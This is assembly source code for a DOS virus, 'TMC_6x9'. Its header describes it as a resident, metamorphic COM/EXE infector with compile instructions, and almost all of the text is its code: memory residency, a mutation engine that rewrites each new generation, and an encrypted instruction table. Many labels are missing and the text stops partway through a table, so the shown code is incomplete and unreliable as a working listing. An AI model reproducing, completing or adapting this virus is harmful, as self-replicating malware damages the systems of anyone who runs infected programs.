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comment *
TMC_6x9 is a 5393 bytes resident appending COM and EXE virus. Infects at
open file, close file and load and/or execute program. TMC_6x9 has an error
handler, retro structures and is metamorphic in file and memory using Tiny
Mutation Compiler v 1.00 [TMC].
To compile TMC_6x9 with Turbo Assembler v 5.0 type:
.model tiny
db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh)
dw 100h ; Delta offset
cld ; Clear direction flag
mov ax,ds ; AX = segment of PSP for current ...
mov [bp+program_seg],ax ; Store segment of PSP for current...
dec ax ; AX = segment of current Memory C...
mov ds,ax ; DS = segment of current Memory C...
mov ax,ds:[03h] ; AX = size of memory block in par...
cmp ax,1900h ; Insufficient memory?
jae resize_mem ; Above or equal? Jump to resize_mem
jmp terminate
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov [bp+mcb_size_],ax ; Store size of memory block in p...
mov bx,[bp+new_mcb_size]
mov ah,4ah ; Resize memory block
int 21h
jnc allocate_mem ; No error? Jump to allocate_mem
jmp terminate
mov ah,48h ; Allocate memory
mov bx,[bp+mcb_size_] ; BX = size of memory block in par...
sub bx,[bp+new_mcb_size]
dec bx ; BX = number of paragraphs to all...
cmp bx,267h ; Insufficient memory?
jae allocat_mem ; Above or equal? Jump to allocat_mem
jmp terminate
int 21h
jnc initiali_tmc ; No error? Jump to initiali_tmc
jmp terminate
mov es,ax ; ES = segment of allocated memory
add es:[02h],6942h ; Store 16-bit random number
mov word ptr es:[0ch],00h
mov es:[04h],118h ; Store offset of block information
mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i...
mov es:[08h],5a8h ; Store offset of data information
lea si,[bp+tmc_table] ; SI = offset of tmc_table
push si ; Save SI at stack
mov bx,730h ; BX = offset of next virus genera...
jmp initial_tmc
mov di,10h ; DI = offset of table of blocks
xor ax,ax ; Zero AX
jmp tmc_ini_loop
add si,ax ; SI = offset of block or instruct...
call decrypt_byte
or al,al ; End of table?
jz calc_blocks ; Zero? Jump to calc_blocks
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
jae exam_block ; Above or equal? Jump to exam_block
cmp al,10h ; Data?
jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_...
sub al,10h ; AL = length of data
jmp tmc_ini_loop
cmp al,11101111b ; End of block?
jne exam_block_ ; Not equal? Jump to exam_block_
mov al,00h ; Don't add anything to offset wit...
jmp tmc_ini_loop
cmp al,11101110b ; Beginning of block?
jne next_byte ; Not equal? Jump to next_byte
mov ax,si ; AX = offset of block identification
dec ax ; AX = offset of block within table
stosw ; Store offset of block within table
mov ax,0ffffh ; Block is still in one part
stosw ; Store block identification
mov ax,02h ; Add two to offset within table
jmp tmc_ini_loop
mov al,02h ; Add two to offset within table
jmp tmc_ini_loop
lea ax,[di-10h] ; AX = number of blocks multiplied...
shr ax,01h ; Divide number of blocks by two
shr ax,01h ; Divide number of blocks by two
mov es:[0ah],ax ; Store number of blocks
xor ax,ax ; End of table
stosw ; Store end of table
mov di,10h ; DI = offset of table of blocks
mov si,es:[di] ; SI = offset of block within table
jmp exam_bloc
push bp ; Save BP at stack
mov bp,es:[0ah] ; BP = number of blocks
call rnd_in_range
pop bp ; Load BP from stack
shl ax,01h ; Multiply random number with two
shl ax,01h ; Multiply random number with two
add ax,10h ; Add ten to random number
mov di,ax ; DI = random offset within table
jmp exam_nxt_blo
add di,04h ; DI = offset of next offset withi...
mov si,es:[di] ; SI = offset of next block within...
or si,si ; End of table?
jnz exam_block__ ; Not zero? Jump to exam_block__
mov di,10h ; DI = offset of table of blocks
mov si,es:[di] ; SI = offset of block within table
jmp exam_block__
push ax ; Save AX at stack
call decrypt_byte
dec si ; Decrease offset of block within ...
cmp al,11101111b ; End of block?
pop ax ; Load AX from stack
jne exam_bloc ; Not equal? Jump to exam_bloc
cmp di,ax ; End of table of blocks?
jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo
jmp exam_tbl_inf
mov ax,es:[di+02h] ; AX = block information
cmp ax,0ffffh ; Block is still in one part?
je exam_bloc_ ; Equal? Jump to exam_bloc_
push di ; Save DI at stack
mov di,ax ; DI = offset of end of first part...
mov al,11101001b ; JMP imm16 (opcode 0e9h)
stosb ; Store JMP imm16
mov ax,bx ; AX = offset within next virus ge...
dec ax ; Decrease offset within next viru...
dec ax ; Decrease offset within next viru...
sub ax,di ; Subtract offset of end of first ...
stosw ; Store 16-bit immediate
pop di ; Load DI from stack
jmp exam_bloc_
call decrypt_byte
cmp al,11101111b ; End of block?
jne exam_bloc__ ; Not equal? Jump to exam_bloc__
jmp end_of_block
cmp al,10h ; Data; CALL; JMP; Data reference...?
ja exam_bloc___ ; Above? Jump to exam_bloc___
push ax bp ; Save registers at stack
mov bp,[bp+probability] ; BP = probability
call rnd_in_range
or ax,ax ; Split up block?
pop bp ax ; Load registers from stack
jz split_block ; Zero? Jump to split_block
jmp exam_bloc___
cmp al,11101111b ; End of block?
jne exam_blo ; Not equal? Jump to exam_blo
jmp end_of_block
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
jae exam_data ; Above or equal? Jump to exam_data
cmp al,10h ; Data?
jbe sto_instruct ; Below or equal? Jump to sto_inst...
sub al,10h ; AL = length of data
jmp sto_instruct
xor cx,cx ; Zero CX
mov cl,al ; CL = length of instruction
push di ; Save DI at stack
mov di,bx ; DI = offset within next virus ge...
jmp sto_ins_loop
call decrypt_byte
stosb ; Store byte of instruction
dec cx ; Decrease counter
jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop
mov bx,di ; BX = offset within next virus ge...
pop di ; Load DI from stack
jmp exam_bloc_
cmp al,11101101b ; Data reference?
jne exam_blo_ ; Not equal? Jump to exam_blo_
push di ; Load DI from stack
mov di,es:[08h] ; DI = offset within data information
mov ax,bx ; AX = offset within next virus ge...
dec ax ; Decrease offset within next viru...
dec ax ; Decrease offset within next viru...
stosw ; Store offset within next virus g...
call decrypt_id
stosw ; Store block identification
mov es:[08h],di ; Store offset within data informa...
pop di ; Load DI from stack
jmp exam_bloc_
cmp al,11101110b ; Beginning of block?
jne sto_call_jmp ; Not equal? Jump to sto_call_jmp
push di ; Save DI at stack
mov di,es:[04h] ; DI = offset within block informa...
mov ax,bx ; AX = offset within next virus ge...
stosw ; Store offset within next virus g...
call decrypt_id
stosw ; Store block identification
mov es:[04h],di ; Store offset within block inform...
cmp ax,4c5h ; Block identification of tmc_table_?
jne exam_message ; Not equal? Jump to exam_message
push si ; Save SI at stack
mov di,bx ; DI = offset within next virus ge...
lea si,[bp+tmc_table] ; SI = offset of tmc_table
mov cx,(table_end-table_begin)
rep movsb ; Move table to top of memory
mov bx,di ; BX = offset within next virus ge...
pop si ; Load SI from stack
jmp examine_next
cmp ax,2328h ; Block identification of message?
jne exam_probabi ; Not equal? Jump to exam_probabi
mov ax,14h ; Probability of including message
cmp [bp+probability],ax ; Include message?
jae examine_next ; Above or equal? Jump to examine_...
call decrypt_byte
sub al,10h ; AL = length of message
mov ah,00h ; Zero AH
add si,ax ; SI = offset of end of message
jmp examine_next
cmp ax,0bech ; Block identification of probabi...?
jne examine_next ; Not equal? Jump to examine_next
mov ax,[bp+probability] ; AX = probability
dec ax ; Decrease probability
cmp ax,05h ; Probability too small?
jae store_probab ; Above or equal? Jump to store_pr...
mov ax,64h ; Reset probability
jmp store_probab
mov es:[bx],ax ; Store probability
add bx,02h ; Add two to offset within next vi...
add si,03h ; SI = offset of beginning of next...
jmp examine_next
pop di ; Load DI from stack
call decrypt_byte
jmp exam_bloc___
push ax di ; Save registers at stack
mov di,es:[06h] ; DI = offset within CALL; JMP; Jc...
mov ax,bx ; AX = offset within next virus ge...
stosw ; Store offset within next virus g...
call decrypt_id
stosw ; Store block identification
mov es:[06h],di ; Store offset within CALL; JMP; J...
pop di ax ; Load registers from stack
mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc...
add bx,03h ; Add three to offset within next ...
cmp al,11110000b ; Jump condition?
jae jcc_imm8 ; Above or equal? Jump to jcc_imm8
jmp exam_bloc_
inc bx ; Increase offset within next viru...
inc bx ; Increase offset within next viru...
jmp exam_bloc_
mov es:[di+02h],bx ; Store offset within next virus g...
add bx,03h ; Add three to offset within next ...
jmp end_of_block
dec si ; Decrease offset of block within ...
mov es:[di],si ; Store offset of block within table
jmp split_block
cmp word ptr es:[0ch],00h
jne correct_i16 ; End of second table? Jump to cor...
pop si ; Load SI from stack
mov es:[0ch],bx ; Store offset within next virus g...
add si,(second_table-first_table)
jmp initial_tmc
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
sub bx,730h ; Subtract offset of next virus ge...
mov ds:[0eh],bx ; Store length of virus
mov si,2c8h ; SI = offset of CALL; JMP; Jcc im...
mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;...
sub cx,si ; Subtract offset of CALL; JMP; Jc...
shr cx,01h ; Divide number of CALL imm16; JMP...
shr cx,01h ; Divide number of CALL imm16; JMP...
jmp jmp_call_loo
lodsw ; AX = offset of block within data...
push ax ; Save AX at stack
lodsw ; AX = offset of block within data...
push cx si ; Save registers at stack
mov si,118h ; SI = offset of block information
mov cx,ds:[04h] ; CX = offset of end of block info...
sub cx,si ; Subtract offset of block informa...
shr cx,01h ; Divide number of block by two
shr cx,01h ; Divide number of block by two
jmp find_block
cmp ax,[si+02h] ; Found block?
je found_block ; Equal? Jump to found_block
add si,04h ; SI = offset of next block in table
dec cx ; Decrease counter
jnz find_block ; Not zero? Jump to find_block
mov dx,[si] ; DX = offset of block
pop si cx ; Load registers from stack
pop bx ; Load BX from stack (AX)
mov al,[bx] ; AL = first byte of instruction
cmp al,11110000b ; Jump condition?
jb sto_call_jm ; Below? Jump to sto_call_jm
sub byte ptr [bx],10000000b
inc bx ; BX = offset of 8-bit immediate
push dx ; Save DX at stack
sub dx,bx ; Subtract offset within next viru...
dec dx ; Decrease 8-bit immediate
cmp dx,7fh ; 8-bit immediate out of range?
jg invert_jcc ; Greater? Jump to invert_jcc
cmp dx,0ff80h ; 8-bit immediate out of range?
jl invert_jcc ; Less? Jump to invert_jcc
mov [bx],dl ; Store 8-bit immediate
inc bx ; BX = offset of end of Jcc imm8
mov [bx],1001000010010000b
mov byte ptr [bx+02h],10010000b
pop dx ; Load DX from stack
jmp correct_i16_
pop dx ; Load DX from stack
dec bx ; BX = offset of Jcc imm8
xor byte ptr [bx],00000001b
inc bx ; BX = offset of 8-bit immediate
mov byte ptr [bx],03h ; Store 8-bit immediate
inc bx ; BX = offset of JMP imm16
mov al,11101001b ; JMP imm16 (opcode 0e9h)
jmp sto_call_jm
mov [bx],al ; Store CALL imm16; JMP imm16
inc bx ; BX = offset of 16-bit immediate
sub dx,bx ; Subtract offset within next viru...
dec dx ; Decrease 16-bit immediate
dec dx ; Decrease 16-bit immediate
mov [bx],dx ; Store 16-bit immediate
jmp correct_i16_
dec cx ; Decrease counter
jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo
mov si,5a8h ; SI = offset of data information
mov cx,ds:[08h] ; CX = offset of end of data infor...
sub cx,si ; Subtract offset of data informat...
shr cx,01h ; Divide number of data references...
shr cx,01h ; Divide number of data references...
jmp data_ref_loo
lodsw ; AX = offset of block within data...
push ax ; Save AX at stack
lodsw ; AX = offset of block within data...
push cx si ; Save registers at stack
mov si,118h ; SI = offset of block information
mov cx,ds:[04h] ; CX = offset of end of block info...
sub cx,si ; Subtract offset of block informa...
shr cx,01h ; Divide number of block by two
shr cx,01h ; Divide number of block by two
jmp find_block_
cmp ax,[si+02h] ; Found block?
je found_block_ ; Equal? Jump to found_block_
add si,04h ; SI = offset of next block in table
dec cx ; Decrease counter
jnz find_block_ ; Not zero? Jump to find_block_
mov ax,[si] ; AX = offset of block
pop si cx ; Load registers from stack
pop bx ; Load BX from stack (AX)
sub ax,730h ; Subtract offset of next virus ge...
mov [bx],ax ; Store 16-bit immediate
dec cx ; Decrease counter
jnz data_ref_loo ; Not zero? Jump to data_ref_loo
jmp restore_code
mov ax,[bp+program_seg] ; AX = segment of PSP for current ...
mov cx,[bp+initial_ss] ; CX = initial SS relative to star...
add cx,10h ; Add ten to initial SS relative t...
add cx,ax ; Add segment of PSP for current p...
push cx ; Save CX at stack
push [bp+initial_sp] ; Save initial SP at stack
mov cx,[bp+initial_cs] ; CX = initial CS relative to star...
add cx,10h ; Add ten to initial CS relative t...
add cx,ax ; Add segment of PSP for current p...
push cx ; Save CX at stack
push [bp+initial_ip] ; Save initial IP at stack
push ax ; Save segment of PSP for current ...
push [bp+mcb_size] ; Save size of memory block in par...
push ds ; Save DS at stack
mov cl,00h ; COM executable
cmp [bp+executa_stat],cl
jne move_virus ; COM executable? Jump to move_virus
lea si,[bp+origin_code] ; SI = offset of origin_code
mov ax,cs:[si] ; AX = first two bytes of original...
mov cs:[100h],ax ; Store first two bytes of origina...
mov al,cs:[si+02h] ; AL = last byte of original code ...
mov cs:[100h+02h],al ; Store last byte of original code...
jmp move_virus
mov ax,[bp+program_seg] ; AX = segment of PSP for current ...
mov cx,[bp+initial_ss] ; CX = initial SS relative to star...
add cx,10h ; Add ten to initial SS relative t...
add cx,ax ; Add segment of PSP for current p...
push cx ; Save CX at stack
push [bp+initial_sp] ; Save initial SP at stack
mov cx,[bp+initial_cs] ; CX = initial CS relative to star...
add cx,10h ; Add ten to initial CS relative t...
add cx,ax ; Add segment of PSP for current p...
push cx ; Save CX at stack
push [bp+incorrect_ip] ; Save incorrect IP at stack
push ax ; Save segment of PSP for current ...
push [bp+mcb_size] ; Save size of memory block in par...
push ds ; Save DS at stack
mov cl,00h ; COM executable
cmp [bp+executa_stat],cl
jne move_virus ; COM executable? Jump to move_virus
lea si,[bp+incorr_code] ; SI = offset of incorr_code
mov ax,cs:[si] ; AX = first two bytes of incorrec...
mov cs:[100h],ax ; Store first two bytes of incorre...
mov al,cs:[si+02h] ; AL = last byte of incorrect code
mov cs:[100h+02h],al ; Store last byte of incorrect code
jmp move_virus
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of DOS communicatio...
cmp byte ptr ds:[501h],10h
jne move_virus_ ; Already resident? Jump to move_v...
jmp virus_exit
mov byte ptr ds:[501h],10h
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
mov ax,ds:[0ch] ; AX = offset within next virus ge...
sub ax,730h ; Subtract offset of next virus ge...
mov [bp+vir_exit_off],ax
mov cx,ds:[0eh] ; CX = length of virus
mov [bp+virus_length],cx
mov si,730h ; SI = offset of next virus genera...
xor di,di ; Zero DI
rep movsb ; Move virus to top of memory
mov cl,04h ; Divide by paragraphs
shr di,cl ; DI = length of next virus genera...
inc di ; Increase length of next virus ge...
mov bx,[bp+mcb_size_] ; BX = size of memory block in par...
sub bx,[bp+new_mcb_size]
sub bx,di ; Subtract length of next virus ge...
dec bx ; Decrease new size in paragraphs
dec bx ; Decrease new size in paragraphs
cmp bx,di ; Insufficient memory?
jae resize_mem_ ; Above or equal? Jump to resize_mem_
jmp virus_exit
mov ah,4ah ; Resize memory block
int 21h
jnc allocat_mem_ ; No error? Jump to allocat_mem_
jmp virus_exit
mov bx,di ; BX = number of paragraphs to all...
mov ah,48h ; Allocate memory
int 21h
jc virus_exit ; Error? Jump to virus_exit
dec ax ; AX = segment of current Memory C...
mov es,ax ; ES = segment of current Memory C...
mov word ptr es:[01h],08h
inc ax ; AX = segment of PSP for current ...
mov es,ax ; AX = segment of PSP for current ...
mov cx,[bp+virus_length]
xor si,si ; Zero SI
xor di,di ; Zero DI
rep movsb ; Move virus to top of memory
push es ; Save ES at stack
push word ptr [bp+vir_exit_off]
mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption...
mov ah,byte ptr [bp+sliding_key]
retf ; Return far
mov ax,4c00h ; Terminate with return code
int 21h
get_rnd_num proc near ; Get 16-bit random number
push cx ; Save CX at stack
in al,40h ; AL = 8-bit random number
mov ah,al ; AH = 8-bit random number
in al,40h ; AL = 8-bit random number
xor ax,es:[02h] ; AX = 16-bit random number
mov cl,ah ; CL = high-order byte of 16-bit r...
rol ax,cl ; AX = 16-bit random number
mov es:[02h],ax ; Store 16-bit random number
pop cx ; Load CX from stack
ret ; Return
rnd_in_range proc near ; Random number within range
or bp,bp ; Zero BP?
jz zero_range ; Zero? Jump to zero_range
push dx ; Save DX at stack
call get_rnd_num
xor dx,dx ; Zero DX
div bp ; DX = random number within range
xchg ax,dx ; AX = random number within range
pop dx ; Load DX from stack
ret ; Return
xor ax,ax ; AX = random number within range
ret ; Return
decrypt_byte proc near ; Decrypt byte of table
mov [bp+ah_],ah ; Store AH
mov ax,si ; AX = offset within table
sub ax,bp ; Subtract delta offset from offse...
sub ax,offset tmc_table ; Subtract offset of tmc_table fro...
mul word ptr [bp+sliding_key]
add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption...
xor al,[si] ; AL = byte of decrypted table
mov ah,[bp+ah_] ; AH = stored AH
inc si ; Increase offset within table
ret ; Return
decrypt_id proc near ; Decrypt block identification in ...
call decrypt_byte
mov ah,al ; AL = byte of decrypted table
call decrypt_byte
xchg al,ah ; AL = byte of decrypted table
ret ; Return
pop es ; Load ES from stack
mov ah,49h ; Free memory
int 21h
pop bx ; Load BX from stack
pop ax ; Load AX from stack
mov ds,ax ; DS = segment of PSP for current ...
mov es,ax ; DS = segment of PSP for current ...
mov ah,4ah ; Resize memory block
int 21h
lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32
pop ax ; Load AX from stack (initial IP)
mov cs:[bx+01h],ax ; Store initial IP
pop ax ; Load AX from stack (initial CS ...)
mov cs:[bx+03h],ax ; Store initial CS relative to sta...
pop ax ; Load AX from stack (initial SP)
pop ss ; Load SS from stack (initial SS ...)
mov sp,ax ; SP = stack pointer
jmp jmp_imm32
jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah)
db 11101010b ; JMP imm32 (opcode 0eah)
dd 00h ; Pointer to virus in top of memory
ah_ db 00h ; Accumulator register (high-orde...)
probability dw 32h ; Probability
crypt_key db 00h ; 8-bit encryption/decryption key
sliding_key dw 00h ; 8-bit sliding encryption/decrypt...
executa_stat db 00h ; Executable status
origin_code db 11000011b,02h dup(00h)
incorr_code db 11000011b,02h dup(00h)
initial_cs dw 0fff0h ; Initial CS relative to start of ...
initial_ss dw 0fff0h ; Initial SS relative to start of ...
initial_ip dw 100h ; Initial IP
incorrect_ip dw 100h ; Incorrect IP
initial_sp dw 0fffeh ; Initial SP
new_mcb_size dw 1000h ; New size in paragraphs
mcb_size dw 0ffffh ; Size of memory block in paragraphs
mcb_size_ dw 00h ; Size of memory block in paragraphs
program_seg dw 00h ; Segment of PSP for current process
virus_length dw 00h ; Length of virus
vir_exit_off dw 00h ; Offset of virus_exit
tmc_table db 11101111b ; End of block
db 11101110b ; Beginning of block
dw 00h ; Block identification of tmc_table
db 04h ; Four bytes instruction
db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh)
dw 1234h ; Delta offset
db 01h ; One byte instruction
cld ; Clear direction flag
db 02h ; Two bytes instruction
mov ax,ds ; AX = segment of PSP for current ...
db 04h ; Four bytes instruction
mov [bp+1234h],ax ; Store segment of PSP for current...
db 11101101b ; Data reference
dw 0befh ; Pointer to program_seg_
db 01h ; One byte instruction
dec ax ; AX = segment of current Memory C...
db 02h ; Two bytes instruction
mov ds,ax ; DS = segment of current Memory C...
db 03h ; Three bytes instruction
mov ax,ds:[03h] ; AX = size of memory block in par...
db 03h ; Three bytes instruction
cmp ax,1900h ; Insufficient memory?
db 01110010b+10000000b ; Below? Jump to terminate_
dw 0beeh ; Pointer to terminate_
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (CS)
db 04h ; Four bytes instruction
mov [bp+1234h],ax ; Store size of memory block in p...
db 11101101b ; Data reference
dw 1394h ; Pointer to mcb_size___
db 04h ; Four bytes instruction
mov bx,[bp+1234h] ; BX = new size in paragraphs
db 11101101b ; Data reference
dw 1393h ; Pointer to new_mcb_siz
db 02h ; Two bytes instruction
mov ah,4ah ; Resize memory block
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to terminate_
dw 0beeh ; Pointer to terminate_
db 02h ; Two bytes instruction
mov ah,48h ; Allocate memory
db 04h ; Four bytes instruction
mov bx,[bp+1234h] ; BX = size of memory block in par...
db 11101101b ; Data reference
dw 1394h ; Pointer to mcb_size___
db 04h ; Four bytes instruction
sub bx,[bp+1234h] ; Subtract new size in paragraphs ...
db 11101101b ; Data reference
dw 1393h ; Pointer to new_mcb_siz
db 01h ; One byte instruction
dec bx ; BX = number of paragraphs to all...
db 04h ; Four bytes instruction
cmp bx,267h ; Insufficient memory?
db 01110010b+10000000b ; Below? Jump to terminate_
dw 0beeh ; Pointer to terminate_
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to terminate_
dw 0beeh ; Pointer to terminate_
db 02h ; Two bytes instruction
mov es,ax ; ES = segment of allocated memory
db 07h ; Seven bytes instruction
add es:[02h],6942h ; Store 16-bit random number
db 07h ; Seven bytes instruction
mov word ptr es:[0ch],00h
db 07h ; Seven bytes instruction
mov es:[04h],118h ; Store offset of block information
db 07h ; Seven bytes instruction
mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i...
db 07h ; Seven bytes instruction
mov es:[08h],5a8h ; Store offset of data information
db 04h ; Four bytes instruction
lea si,[bp+1234h] ; SI = offset of tmc_table_
db 11101101b ; Data reference
dw 4c5h ; Pointer to tmc_table_
db 01h ; One byte instruction
push si ; Save SI at stack
db 03h ; Three bytes instruction
mov bx,730h ; BX = offset of next virus genera...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0fa0h ; Pointer to initial_tmc
db 11101111b ; End of block
initial_tmc_ db 11101110b ; Beginning of block
dw 0fa0h ; Block identification of initial_...
db 03h ; Three bytes instruction
mov di,10h ; DI = offset of table of blocks
db 02h ; Two bytes instruction
xor ax,ax ; Zero AX
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bb8h ; Pointer to tmc_ini_loo
db 11101111b ; End of block
tmc_ini_loo db 11101110b ; Beginning of block
dw 0bb8h ; Block identification of tmc_ini_loo
db 02h ; Two bytes instruction
add si,ax ; SI = offset of block or instruct...
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 02h ; Two bytes instruction
or al,al ; End of table?
db 01110100b+10000000b ; Zero? Jump to calc_blocks_
dw 0bbch ; Pointer to calc_blocks_
db 02h ; Two bytes instruction
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
db 01110011b+10000000b ; Above or equal? Jump to exam_blo__
dw 0bb9h ; Pointer to exam_blo__
db 02h ; Two bytes instruction
cmp al,10h ; Data?
db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_...
dw 0bb8h ; Pointer to tmc_ini_loo
db 02h ; Two bytes instruction
sub al,10h ; AL = length of data
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bb8h ; Pointer to tmc_ini_loo
db 11101111b ; End of block
exam_blo__ db 11101110b ; Beginning of block
dw 0bb9h ; Block identification of exam_blo__
db 02h ; Two bytes instruction
cmp al,11101111b ; End of block?
db 01110101b+10000000b ; Not equal? Jump to exam_blo___
dw 0bbah ; Pointer to exam_blo___
db 02h ; Two bytes instruction
mov al,00h ; Don't add anything to offset wit...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bb8h ; Pointer to tmc_ini_loo
db 11101111b ; End of block
exam_blo___ db 11101110b ; Beginning of block
dw 0bbah ; Block identification of exam_blo___
db 02h ; Two bytes instruction
cmp al,11101110b ; Beginning of block?
db 01110101b+10000000b ; Not equal? Jump to next_byte_
dw 0bbbh ; Pointer to next_byte_
db 02h ; Two bytes instruction
mov ax,si ; AX = offset of block identification
db 01h ; One byte instruction
dec ax ; AX = offset of block within table
db 01h ; One byte instruction
stosw ; Store offset of block within table
db 03h ; Three bytes instruction
mov ax,0ffffh ; Block is still in one part
db 01h ; One byte instruction
stosw ; Store block identification
db 03h ; Three bytes instruction
mov ax,02h ; Add two to offset within table
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bb8h ; Pointer to tmc_ini_loo
db 11101111b ; End of block
next_byte_ db 11101110b ; Beginning of block
dw 0bbbh ; Block identification of next_byte_
db 02h ; Two bytes instruction
mov al,02h ; Add two to offset within table
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bb8h ; Pointer to tmc_ini_loo
db 11101111b ; End of block
calc_blocks_ db 11101110b ; Beginning of block
dw 0bbch ; Block identification of calc_blo...
db 03h ; Three bytes instruction
lea ax,[di-10h] ; AX = number of blocks multiplied...
db 02h ; Two bytes instruction
shr ax,01h ; Divide number of blocks by two
db 02h ; Two bytes instruction
shr ax,01h ; Divide number of blocks by two
db 04h ; Four bytes instruction
mov es:[0ah],ax ; Store number of blocks
db 02h ; Two bytes instruction
xor ax,ax ; End of table
db 01h ; One byte instruction
stosw ; Store end of table
db 03h ; Three bytes instruction
mov di,10h ; DI = offset of table of blocks
db 03h ; Three bytes instruction
mov si,es:[di] ; SI = offset of block within table
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc0h ; Pointer to exam_bl
db 11101111b ; End of block
split_bloc db 11101110b ; Beginning of block
dw 0bbdh ; Block identification of split_bloc
db 01h ; One byte instruction
push bp ; Save BP at stack
db 05h ; Five bytes instruction
mov bp,es:[0ah] ; BP = number of blocks
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bd5h ; Pointer to rnd_in_rang
db 01h ; One byte instruction
pop bp ; Load BP from stack
db 02h ; Two bytes instruction
shl ax,01h ; Multiply random number with two
db 02h ; Two bytes instruction
shl ax,01h ; Multiply random number with two
db 03h ; Three bytes instruction
add ax,10h ; Add ten to random number
db 02h ; Two bytes instruction
mov di,ax ; DI = random offset within table
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bbeh ; Pointer to exam_nxt_bl_
db 11101111b ; End of block
exam_nxt_bl_ db 11101110b ; Beginning of block
dw 0bbeh ; Block identification of exam_nxt...
db 03h ; Three bytes instruction
add di,04h ; DI = offset of next offset withi...
db 03h ; Three bytes instruction
mov si,es:[di] ; SI = offset of next block within...
db 02h ; Two bytes instruction
or si,si ; End of table?
db 01110101b+10000000b ; Not zero? Jump to exam_blo____
dw 0bbfh ; Pointer to exam_blo____
db 03h ; Three bytes instruction
mov di,10h ; DI = offset of table of blocks
db 03h ; Three bytes instruction
mov si,es:[di] ; SI = offset of block within table
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bbfh ; Pointer to exam_blo____
db 11101111b ; End of block
exam_blo____ db 11101110b ; Beginning of block
dw 0bbfh ; Block identification of exam_blo...
db 01h ; One byte instruction
push ax ; Save AX at stack
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 01h ; One byte instruction
dec si ; Decrease offset of block within ...
db 02h ; Two bytes instruction
cmp al,11101111b ; End of block?
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 01110101b+10000000b ; Not equal? Jump to exam_bl
dw 0bc0h ; Pointer to exam_bl
db 02h ; Two bytes instruction
cmp di,ax ; End of table of blocks?
db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_
dw 0bbeh ; Pointer to exam_nxt_bl_
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bcah ; Pointer to exam_tbl_in
db 11101111b ; End of block
exam_bl db 11101110b ; Beginning of block
dw 0bc0h ; Block identification of exam_bl
db 04h ; Four bytes instruction
mov ax,es:[di+02h] ; AX = block information
db 03h ; Three bytes instruction
cmp ax,0ffffh ; Block is still in one part?
db 01110100b+10000000b ; Equal? Jump to exam_bl_
dw 0bc1h ; Pointer to exam_bl_
db 01h ; One byte instruction
push di ; Save DI at stack
db 02h ; Two bytes instruction
mov di,ax ; DI = offset of end of first part...
db 02h ; Two bytes instruction
mov al,11101001b ; JMP imm16 (opcode 0e9h)
db 01h ; One byte instruction
stosb ; Store JMP imm16
db 02h ; Two bytes instruction
mov ax,bx ; AX = offset within next virus ge...
db 01h ; One byte instruction
dec ax ; Decrease offset within next viru...
db 01h ; One byte instruction
dec ax ; Decrease offset within next viru...
db 02h ; Two bytes instruction
sub ax,di ; Subtract offset of end of first ...
db 01h ; One byte instruction
stosw ; Store 16-bit immediate
db 01h ; One byte instruction
pop di ; Load DI from stack
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc1h ; Pointer to exam_bl_
db 11101111b ; End of block
exam_bl_ db 11101110b ; Beginning of block
dw 0bc1h ; Block identification of exam_bl_
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0be0h ; Pointer to decrypt_byt
db 02h ; Two bytes instruction
cmp al,11101111b ; End of block?
db 01110100b+10000000b ; Equal? Jump to end_of_bloc
dw 0bc9h ; Pointer to end_of_bloc
db 02h ; Two bytes instruction
cmp al,10h ; Data; CALL; JMP; Data reference...?
db 01110111b+10000000b ; Above? Jump to exam_bl__
dw 0bc2h ; Pointer to exam_bl__
db 01h ; One byte instruction
push ax ; Save AX at stack
db 01h ; One byte instruction
push bp ; Save BP at stack
db 04h ; Four bytes instruction
mov bp,[bp+1234h] ; BP = probability
db 11101101b ; Data reference
dw 0bech ; Pointer to probability_
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bd5h ; Pointer to rnd_in_rang
db 02h ; Two bytes instruction
or ax,ax ; Split up block?
db 01h ; One byte instruction
pop bp ; Load BP from stack
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 01110100b+10000000b ; Zero? Jump to split_bloc_
dw 0bc8h ; Pointer to split_bloc_
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bc2h ; Pointer to exam_bl__
db 11101111b ; End of block
